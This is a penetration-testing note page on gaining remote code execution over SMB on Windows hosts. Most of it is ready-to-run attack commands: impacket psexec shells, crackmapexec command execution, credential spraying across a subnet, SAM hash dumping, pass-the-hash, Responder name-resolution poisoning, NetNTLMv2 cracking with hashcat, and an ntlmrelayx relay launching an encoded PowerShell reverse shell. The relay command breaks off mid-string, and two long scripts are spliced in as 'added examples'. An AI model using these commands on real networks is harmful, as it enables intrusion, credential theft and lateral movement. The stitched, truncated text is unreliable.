Smb

RCE

Notes and commands for RCE.

2025-05-29
Tags: network, smb, rce

If the target is Windows and we have valid credentials, we can use impacket or crackmapexec to run commands in cmd / PowerShell on the machine over SMB.

impacket-psexec (see impacket-psexec -h for the full options) drops us into an interactive shell; it works by uploading and starting a service, so the shell runs as SYSTEM:

impacket-psexec administrator:'Password123!'@10.10.110.17

crackmapexec runs a single command instead: -x runs it through cmd.exe, -X through PowerShell. --exec-method selects how the command is launched on the host (smbexec here; wmiexec and atexec are the alternatives):

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Local admin passwords are often reused across machines. Spray the credential over the whole subnet to see where it works and who is logged on there (useful for finding a box where a more privileged user has a session):

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

The SAM database holds the NTLM password hashes of the machine's local users; with admin rights we can dump it:

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

If we only obtain the NT hash and not the plaintext password, we can still authenticate by passing the hash (-H takes the NT hash):

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Sniffing for hashes: Responder answers the LLMNR / NBT-NS / mDNS name-resolution broadcasts a Windows host sends when a lookup fails (for example a mistyped hostname or share name), so the client then authenticates to us and hands over its NetNTLMv2 hash:

sudo responder -I ens33

Captured hashes are stored in /usr/share/responder/logs/

Crack the captured NetNTLMv2 hashes with hashcat (mode 5600 is NetNTLMv2):

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
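Responder appends a new line to its log file every time a client authenticates, so the same account turns up many times, and a NetNTLMv1 capture mixed in would be rejected by -m 5600. The following is an added example, not code from the original notes: a small shell filter that keeps one well-formed NetNTLMv2 line per user@domain before the file goes to hashcat. The sample log lines are constructed (made-up hex values, not real captures), and the log file name pattern SMB-NTLMv2-SSP-<ip>.txt is the one Responder uses for SMB captures.

```shell
#!/bin/sh
# Added example, not part of the original notes: pick one NetNTLMv2 capture
# per user out of Responder's log files before handing them to hashcat.
# Responder appends a line every time a client authenticates, so the same
# account shows up many times; hashcat only needs one valid line per account
# and -m 5600 rejects lines in another format (e.g. NetNTLMv1).
set -eu

# Responder writes SMB captures to files named SMB-NTLMv2-SSP-<ip>.txt, one
# hash per line in the form hashcat mode 5600 expects:
#   user::DOMAIN:<16-hex server challenge>:<32-hex NTProofStr>:<hex blob>
# Keep only lines of that shape and the first one seen per user@domain.
dedup_ntlmv2() {
    awk -F: '
        NF == 6 && $2 == "" &&
        length($4) == 16 && $4 ~ /^[0-9a-fA-F]+$/ &&
        length($5) == 32 && $5 ~ /^[0-9a-fA-F]+$/ {
            key = tolower($1 "@" $3)
            if (!(key in seen)) { seen[key] = 1; print }
        }
    ' "$@"
}

# Constructed sample log (made-up values, not real captures): jdoe
# authenticated twice, svc_backup once, plus one NetNTLMv1 line whose
# 48-hex response fields would need -m 5500 instead of -m 5600.
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
jdoe::CORP:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d201000000000000
JDOE::CORP:8877665544332211:99887766554433221100ffeeddccbbaa:0101000000000000d0653150de09d201000000000000
svc_backup::CORP:0f0e0d0c0b0a0908:00112233445566778899aabbccddeeff:0101000000000000e0653150de09d201000000000000
legacy::CORP:aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffff:0123456789abcdef0123456789abcdef0123456789abcdef:fedcba9876543210
EOF

# Usage against real logs (not run here):
#   dedup_ntlmv2 /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt > hash.txt
#   hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
dedup_ntlmv2 "$SAMPLE_LOG"
```

Run against the sample, it prints two lines: jdoe's first capture and svc_backup's; the second jdoe line (duplicate account, different challenge) and the NetNTLMv1 line are dropped.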

SMB poisoning / relay

Instead of cracking, the captured authentication can be relayed straight to another host. Responder's own SMB server must be turned off first, otherwise it answers the SMB connection itself and nothing reaches the relay. Check the setting:

grep 'SMB =' /etc/responder/Responder.conf
	SMB = Off

Use impacket's ntlmrelayx to relay the authentication to the target (-t) and run a command there with -c, for example a base64-encoded PowerShell reverse shell generated at https://www.revshells.com/. Relaying to SMB only works if the target does not require SMB signing:

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgA
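Before starting the ntlmrelayx command above, the Responder config check from the previous step can be scripted so the relay is only launched when SMB = Off. The following is an added example, not code from the original notes or from Responder or impacket: three small shell functions that read, check and flip the SMB setting in a Responder.conf-style file. It assumes Responder's default config layout (one "Key = Value" line per server under [Responder Core]); the config snippet in the block is constructed, not the real file.

```shell
#!/bin/sh
# Added example, not part of the original notes: a pre-flight check that
# Responder's own SMB server is disabled before ntlmrelayx is started.
# Both want port 445, and if Responder answers the SMB connection it captures
# the hash itself and nothing reaches the relay. Assumes Responder's default
# config format, a "Key = Value" line per server under [Responder Core].
set -eu

# Print the value of a "Key = Value" setting from Responder.conf.
# $1 = path to the config file, $2 = key name (e.g. SMB)
responder_setting() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\([^[:space:]]*\).*/\1/p" "$1" | head -n 1
}

# Succeed (exit 0) only if SMB = Off, so it can gate the ntlmrelayx launch.
responder_smb_off() {
    [ "$(responder_setting "$1" SMB)" = "Off" ]
}

# Rewrite SMB = On to SMB = Off, leaving every other line untouched
# (written via a temp file so it works with both GNU and BSD sed).
disable_responder_smb() {
    tmp="$(mktemp)"
    sed "s/^\([[:space:]]*SMB[[:space:]]*=[[:space:]]*\)On[[:space:]]*$/\1Off/" "$1" > "$tmp"
    mv "$tmp" "$1"
}

# Write a constructed config snippet in Responder.conf's layout (not the
# real file) to a temp file and print its path.
make_sample_conf() {
    f="$(mktemp)"
    cat > "$f" <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
EOF
    printf '%s\n' "$f"
}

# On a real box: check /etc/responder/Responder.conf, fix it if needed, and
# only then start the relay:
#   responder_smb_off /etc/responder/Responder.conf || disable_responder_smb /etc/responder/Responder.conf
#   impacket-ntlmrelayx --no-http-server -smb2support -t <target> -c '<command>'
CONF="$(make_sample_conf)"
if responder_smb_off "$CONF"; then
    echo "SMB already off"
else
    disable_responder_smb "$CONF"
    echo "SMB was on, now: $(responder_setting "$CONF" SMB)"
fi
```

The value parser stops at the first whitespace after the "=", so trailing spaces or comments on the line do not break the comparison; only the SMB line is rewritten, the SQL and RDP lines keep their values.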